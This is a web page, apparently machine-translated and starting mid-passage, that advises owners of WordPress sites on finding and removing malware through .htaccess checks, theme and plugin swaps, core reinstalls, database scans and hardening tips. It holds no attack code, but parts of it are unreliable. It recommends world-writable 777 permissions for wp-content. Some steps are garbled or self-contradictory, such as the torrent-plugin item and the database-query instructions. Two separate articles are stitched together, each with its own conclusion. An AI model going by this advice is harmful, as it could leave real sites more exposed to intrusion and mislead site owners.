If such lines were found, then they should not be deleted immediately. First, ask the hosting provider for logs for the approximate file modification period .htaccess and analyze from which IP address and when this file was sent. It is possible that other files were changed at the same time.

If only this file has been changed, then the passwords for FTP and the administrative interface should be changed. If changes were also detected in *.php, *.html files, then, most likely, a PHP script was uploaded to the site, through which an attacker can gain access to all available information.

Prevention of this type of threat is quite simple and does not require special costs. It is important to remember the following rules:

  • do not store passwords in FTP managers or in email messages;
  • update WordPress core regularly;
  • update plugins and themes;
  • do not use simple passwords.

It is possible that you initially followed all these rules, and the point is not the vulnerability of the Web site, but the insufficient protection of the server itself on which the resource is located. In such cases, send a detailed description of the problem to the technical support of the hosting provider and together look for a solution to the problem.

How to Find Malicious SQL Injection in WordPress

So, we have already looked at various ways to infect and disinfect a Web site based on the free WordPress CMS. But one of the popular methods of penetration and hacking is SQL injection(sql injection). This method of infection is based on making a request to the database, in which the password from the administrative interface is stolen or other confidential information is obtained. With regard to WordPress, we can say that the “gaps” known at the time of the last update in the database security system and in query filtering have been fixed.

To protect yourself from hacking the site using SQL injection, you should carefully choose plugins, since they work with the database, and therefore an insufficiently conscientious developer could leave a loophole for attackers. Perhaps, in some free plugins, such a hidden entrance is intentionally integrated. When choosing a plugin, you need to be guided not only by its capabilities, but also by popularity, as well as the number of installations made. It is also worth studying the reviews left on the developer page. If you have the slightest doubt, or if there is a negative review regarding security, then it is better not to risk it and install another plugin with similar functionality.

Most CMS are built in such a way that a user with minimal programming skills can install it, configure it, enable one of the proposed types of design and start filling the Web site with the necessary information. Therefore, Web sites are often in the hands of inexperienced administrators who cannot recognize such an intrusion through SQL injection.

But the WordPress Exploit Scanner plugin mentioned earlier can also work with the database, and in some cases it can find extraneous functionality embedded in the database. But you will have to delete it manually using special SQL commands in the PHPMyAdmin database administration program. Such actions must be performed very carefully, as an incorrect request or command can damage the structure or contents of the database. To prevent this from happening, you should take care of the process of creating database backups in advance. By the way, the Exploit Scanner itself can issue recommendations for fixing SQL queries.

Practical Ways to Protect Websites Built on WordPress

There are many tips on the internet on how to secure and protect a website running on the free WordPress CMS. Below is a list of the most effective recommendations:

  • you should change and never use the standard names for users with administrative rights, for example, admin, administrator, etc.;
  • it is necessary to install a captcha, which significantly reduces the risk of hacking by brute force passwords;
  • to enter the administrative interface, a complex alphanumeric password must be used, at least 8-10 characters;
  • the password should not be stored in a Web browser, text files, etc. offline storage on a piece of paper is much more reliable;
  • it is also necessary to protect the password of the mailbox that was specified during the installation of WordPress;
  • regularly perform backups manually or using special plug-ins or third-party programs, while the resulting backups must be stored in several places;
  • do not install plugins from unknown sources, hacked paid plugins and themes;
  • you should install plugins that are responsible for the security of WordPress files and database, and regularly check the status of the site using an antivirus;
  • update the core, plugins and themes in time (before each update, be sure to make a full backup);
  • file admin.php should be renamed to make it difficult to identify;
  • register a Web site with Yandex or Google in order to be aware of problems related to site security and its indexing;
  • you need to check permissions for directories and files WordPress: permissions are set for directories 755 , for all files 644 , separately for the catalog wp-content rights should be 777 ;
  • if there is no need for user registration, then it is better to disable this function altogether;
  • you can also disable the ability to comment and leave only the form for commenting through social networks;
  • file should be deleted readme.htm, located in the root directory, which stores information about the installed version of WordPress (this must be done after each update of the CMS);
  • also the mention of the version of WordPress being used should be removed from the file functions.php by adding the line there: remove_action("wp_head", "wp_generator");

What to do if the problem is still not solved?

There are no hopeless situations. It may seem that you have tried absolutely all the ways to neutralize the virus code or hidden advertising links. It is possible that the Web site has stopped working after an unsuccessful virus cleaning, and you are no longer able to restore it. Don't despair, but try contacting specialists who, for a fee, will help you restore your Web site and give you tips on how to improve its security and performance. You can write to WordPress support, find the answer in the WordPress Codex, or ask a question on the official forum.

If you got rid of viruses, correctly configured the plugins responsible for security, changed passwords, and after a while the situation repeated again, then you should consider changing the hosting provider. Most likely, the servers hosting the Web site are poorly secured or misconfigured.

Conclusion

Most of the tips presented will remain relevant for a very long time, as they apply not only to WordPress, but to any Web sites, regardless of the platform used. The Internet is developing rapidly, new updates are constantly appearing and new viruses are being written, gaps in the security of CMS and various services are being closed. Keep up with the times, regularly upgrade and update the Web site, and then you can avoid such emergencies.

As one of the most popular platforms, WordPress is attacked from time to time by trojans, malware injections, and the like.

There are several articles about WordPress built. They also contain information on how to clean your resource from malware. This topic is so relevant and critical that its constant discussion will not only not harm, but will also benefit the owners of various sites.

Beginners in creating sites, who have just started using various CMS for work, are rather not weakly frightened when they discover that their resource has been attacked by viruses. Trying to restore the normal operation of projects, they make various mistakes, which ultimately aggravates the situation and in some cases leads to the loss of data or necessary files. In this article, we will tell you how to study current threats, detect them and clean the site of viruses without harming your data and content.

Make backups regularly!

Before we start discussing WordPress hacking, it is essential to discuss backups. If you use WordPress and plan to have a large number of visitors, you simply must get in the habit of backing up your blog regularly. Save all content, settings and databases to be able to fully restore all files. This will not take much time, but it will help to avoid serious problems in the future.

Which is better: site restoration or timely detection of a virus?

If you use certain utilities to create backups, for example, you have the ability to restore the project to its original state. However, I don't think it's a very good idea. Taking advantage of creating backups without finding and removing malicious code will not solve the problem, your site will still be left in a vulnerable state. So the best solution would be to find the virus, get rid of it, restore the site itself and subsequently close the vulnerability.

Malware detection

Malicious software is content that is distributed with the intent to harm or obtain your personal information. This malicious code can be spoofed or inserted into design elements, plugins, files, or a database. If the site has been hacked, malicious software can also get onto visitors' computers, redirecting them to various resources that also contain other viruses, or simply opening the necessary sites through frames from your site. At the moment, there are many different variations of hacking, both WordPress engines and any other sites.

Search for infected pages

You can start your search by browsing the pages for malicious malicious code.

  • Is it visible on all pages?
  • Does it appear on certain pages or posts?
  • Where exactly does the malicious code appear? Is it in the footer, in the table of contents, somewhere in the content, or in the sidebar?

The answers to these questions will tell you exactly where to look for the problem.

Check design elements and plugins for malicious code

The most commonly infected objects are themes and plugins. You can start searching for code by checking the active theme (currently in use) for malicious code. If you have added any themes other than the default one, check each one.

The easiest way to check is to copy a backup copy of the entire theme directory to your local computer, then delete the entire theme folder from your server. Then, download the default theme for WordPress called TwentyEleven from the official source and upload it to the server. After completing all the procedures, check the site - if the code of the attackers has disappeared, then the problem was in one of the design themes.

Now, you can find the malicious code in the old skins folder by opening each one in turn in a text editor. Scrolling through the code, you may notice a suspicious-looking part of it and get rid of it. There is also an easier option - you can simply download a new copy of the active skin from the developer's website.

Imagine such a scenario that you could not find a virus in your templates. Then, the next step is to search for it in the plugins you use. In this case, the same method that is used in the case of themes is suitable.

Create a backup copy of the plug-ins on your local computer, while deleting them from the server. Next, check your site for malware and see if it has disappeared. If the problem is solved, then it was in one of your plugins. Download fresh copies of the plugins that you have and enable them one by one. In the event that the virus reappears after downloading and installing new copies, remove the infected plugin from your server.

The best ways to secure your themes and plugins are:

  1. Remove unused plugins and themes.
  2. Make sure you download themes and plugins from a trusted source.
  3. Always download updated versions of the themes and plugins you use.
  4. Unused themes and plugins downloaded from various torrents and unofficial sites.

How to detect malicious code embedded in WordPress itself:

If you have checked the themes and plugins you use and the infection is still present on your site, the next step is to check the core WordPress files. Again, the method used in cases with themes and plugins will help here.

First of all, back up all the necessary files (for example, the wp-config file, the wp-content folder, as well as the .htaccess and . files). After that, delete all files from the server, download the new engine archive and upload it to the server. Fill out the wp-config file with the required information. After that, check the site for viruses, if they disappear, then the problem was in the portal itself - the main engine files were infected. Restore the necessary content from a backup: images, various video or audio files.

How to protect core WordPress files from infection:

  1. Make sure the permissions are set to 644 on all files.
  2. Do not change or move core files.
  3. Use only complex passwords everywhere - on FTP, Database, WordPress, etc.

How to detect a vulnerability in the WordPress database:

The next step is to check the databases. First of all, make sure you have a database backup. If you regularly create backups, you can restore it to its original form quickly and without problems, but the first thing you need to do is make sure that the vulnerability is in the database.

Download and install the plugin for finding exploits Exploit Scanner. Run the plugin and crawl the site. The Exploit Finder Plugin will scan your database, core portal files, plugins, and skins for suspicious code and return the results when the scan is complete. Once the scan is over, you will need to take a look at the results. In the scan report, you will find a large number of false threats and warnings, so read the log slowly and carefully. The scanner does not remove anything, so once you find malicious code, you will need to manually remove it from the database.

  • If you have not backed up your database before, do so even if your site has been attacked and infected.
  • Having an infected database is in any case better than having no backups at all.

Copy the suspicious-looking code from the scan log if any is found by the exploit scanner and run the query through mysql as if the site is running normally and the query was made through phpmyadmin.

Based on where the suspicious code is inserted, such as articles, comments, or any sections, you will need to insert it into the newly created database and see what happens in the end. If there are not so many suspicious points in the scan results, you can safely edit the fields manually, removing unnecessary code. Otherwise, if there is too much suspicious code in the database, you might want to use the Find and Replace option, but this method is quite dangerous, and if you are not sure, there is a risk of losing important data.

We went through all the points, and you ran out of ideas where to look for the problem?

I think that most people can easily detect, study and remove a virus if their site is attacked and infected. But, nevertheless, detecting a virus in certain cases can be quite difficult. Just in case you've tried all the methods above and still can't find what exactly the problem is, you can always turn to WordPress security experts - who can easily clean your site of viruses for a fee.

Finding the right security specialist for WordPress products

There are many freelancing websites where you can offer a reward for helping solve a problem. Before the final selection of a candidate, pay attention to the reviews and awards that he has received, and choose the most experienced and competent. You can also post offers on popular SEO forums or freelance exchanges. Be sure to make sure that the person you are hiring has a good reputation, references and work experience.

Conclusion

WordPress sites are as secure as possible. As a site owner, it is your responsibility to monitor the status of the site, use the most up-to-date methods to protect against possible threats. Use complex passwords, regularly check access rights and create backups, clean the site from unnecessary information in a timely manner.

Top Related Articles

Types of UML diagrams Types of uml diagrams
Types of UML diagrams Types of uml diagrams
Free programs for Windows free download Browser bypass blocking
Free programs for Windows free download Browser bypass blocking
Installing a CD-ROM drive
Installing a CD-ROM drive
Categories:
© 2022 bumotors.ru. How to set up smartphones and PCs. Informational portal.